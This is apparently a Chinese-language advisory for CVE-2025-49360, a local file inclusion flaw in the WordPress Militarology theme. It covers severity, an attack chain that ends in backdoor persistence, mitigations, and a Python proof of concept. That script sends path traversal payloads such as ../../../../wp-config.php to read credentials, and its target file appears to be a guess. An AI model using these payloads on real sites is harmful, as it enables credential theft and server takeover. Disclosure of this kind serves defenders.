CVE-2025-49360: Militarology主题本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-49360

漏洞类型

本地文件包含 (LFI)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AncoraThemes Militarology

漏洞概述

CVE-2025-49360是WordPress Militarology主题中的一个高危本地文件包含漏洞，由PatchStack安全团队发现并报告。该漏洞存在于PHP程序对文件名的不当控制，允许攻击者通过构造恶意请求包含服务器上的任意本地文件。由于CVSS评分达到8.1分（高危），且攻击复杂度较低，无需认证和用户交互即可利用，因此该漏洞对使用该主题的WordPress网站构成严重威胁。攻击者可能利用此漏洞读取敏感配置文件如wp-config.php，获取数据库凭证、API密钥等敏感信息，进而可能导致完整的服务器接管。 Militarology主题由AncoraThemes开发，主要用于军事相关网站和博客。

技术细节

该漏洞是典型的PHP本地文件包含(Local File Inclusion, LFI)问题。在PHP应用程序中，当使用include、require、include_once或require_once等函数加载文件时，如果未对用户可控的输入进行严格的过滤和验证，攻击者可以通过路径遍历技术(如使用../)读取服务器上的任意文件。在Militarology主题中，某个PHP文件直接使用GET或POST参数作为文件路径传递给include/require语句，攻击者可以通过构造如下请求来利用此漏洞：?file=../../../../etc/passwd或?file=../../../../wp-config.php。由于PHP的allow_url_include通常为off，此漏洞主要利用本地文件包含而非远程文件包含(RFI)。攻击者首先尝试读取wp-config.php获取数据库凭证，然后可能利用其他漏洞或配置问题实现远程代码执行。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标网站使用的WordPress主题，确认使用的是Militarology主题且版本<=1.0.15

STEP 2

2

漏洞探测：攻击者尝试访问主题中的可疑PHP文件，使用常见参数名如file、page、template等进行测试

STEP 3

3

路径遍历利用：构造包含路径遍历序列的payload，如../../../../wp-config.php，尝试读取服务器敏感文件

STEP 4

4

敏感信息获取：成功读取wp-config.php后，获取数据库凭证、WordPress盐值、API密钥等敏感配置信息

STEP 5

5

权限提升：利用获取的凭证访问数据库或后台，尝试上传恶意插件/主题实现远程代码执行

STEP 6

6

持久化控制：在服务器上植入后门，建立持久化访问通道，完成服务器接管

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-49360 PoC - Local File Inclusion in Militarology Theme
# Target: WordPress site using Militarology theme <= 1.0.15

target_url = "http://target-site.com/wp-content/themes/militarology/"

# Test LFI vulnerability - Read wp-config.php
def exploit_lfi():
    print("[*] Testing CVE-2025-49360 - Local File Inclusion")
    
    # Common vulnerable parameters
    params = ['file', 'page', 'template', 'theme', 'load', 'include']
    
    # Path traversal payload to read wp-config.php
    payload = "../../../../wp-config.php"
    
    for param in params:
        try:
            url = target_url + "functions.php"  # or other vulnerable file
            data = {param: payload}
            response = requests.get(url, params=data, timeout=10)
            
            if 'DB_NAME' in response.text or 'DB_USER' in response.text:
                print(f"[+] Vulnerable parameter found: {param}")
                print(f"[+] Extracted config content preview:")
                print(response.text[:500])
                return True
        except Exception as e:
            print(f"[-] Error: {e}")
    
    print("[-] LFI not confirmed, manual testing required")
    return False

# Read sensitive files
def read_file(filepath):
    payload = "../../../../" + filepath
    url = target_url + "functions.php"
    response = requests.get(url, params={"file": payload})
    return response.text

if __name__ == "__main__":
    exploit_lfi()

影响范围

Militarology <= 1.0.15

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 在Web服务器配置中添加规则，拦截包含路径遍历字符(%,2e,../)的可疑请求；2) 临时禁用或替换Militarology主题，使用其他安全的主题替代；3) 在wp-config.php中将数据库密码和WordPress盐值更换为新的强密码；4) 加强服务器访问日志监控，及时发现异常访问模式；5) 限制PHP脚本对系统目录的访问权限，使用open_basedir限制可访问目录范围。